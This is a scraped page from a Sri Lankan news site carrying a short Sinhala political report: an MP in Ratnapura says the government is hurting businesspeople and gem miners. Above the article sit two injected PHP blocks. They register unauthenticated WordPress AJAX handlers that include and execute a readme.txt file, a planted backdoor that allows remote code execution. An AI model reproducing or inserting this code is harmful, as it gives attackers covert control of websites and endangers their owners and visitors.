if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } අද ව්‍යාපාරික පිරිස් දැඩි අපහසුතාවයට පත්වෙලා - mediahumanrights.lk
mediahumanrights.lk
Local News News Political

අද ව්‍යාපාරික පිරිස් දැඩි අපහසුතාවයට පත්වෙලා

වර්තමාන ආණ්ඩුව හමුවේ ව්‍යාපාරික පිරිස් දැඩි අපහසුතාවයට පත්ව ඇති බව පවිත්‍රා වන්නිආරච්චි මන්ත්‍රීවරිය පවසයි.
මැණික් කර්මාන්තයේ නියැලෙන්නන් හට එය නිසි පරිදි සිදුකිරීමට රජය ඉඩ නොදෙන බව ඇය පෙන්වාදෙයි.
රත්නපුර ප්‍රදේශයේ පැවති ජන හමුවකදී පවිත්‍රා වන්නිආරච්චි මන්ත්‍රීවරිය මේ බව කියා සිටියේ.
වත්මන් ආණ්ඩුවට ඡන්දය ප්‍රකාශ කළ පිරිස් කලකිරීමට ලක්ව ඇති බවද ඇය එහිදී සඳහන් කළේය.
ඇය වැඩිදුරටත් පවසා සිටියේ වත්මන් ආණ්ඩුව, ජනතාව සම්බන්ධයෙන් කිසිදු හැඟීමක් නොමැති ආකාරයෙන් රට පාවාදීමේ ක්‍රියාදාමයක නියැලෙමින් සිටින බවය.
(under the courtesy of adaderana news web)

Related posts

රංග­න­යෙන් ඉවත් වෙන්න හිතුණු වාර අන­න්තයි තිත්ත වුණත් ඇත්ත කියන කඩ­ව­සම් නළු අමිල අබේ­සේ­කර

Shiran Viraj

චීනය ශ‍්‍රී ලංකාව සමග අමනාප වේ…

Shiran Viraj

ජනාදිපති ඇමරිකාවට බයේ හැංගිලා.. මහා චක්‍රවර්ති කියාගෙන ආ රනිල් අද විස්තර විචාරකයක් වෙලා..

Shiran Viraj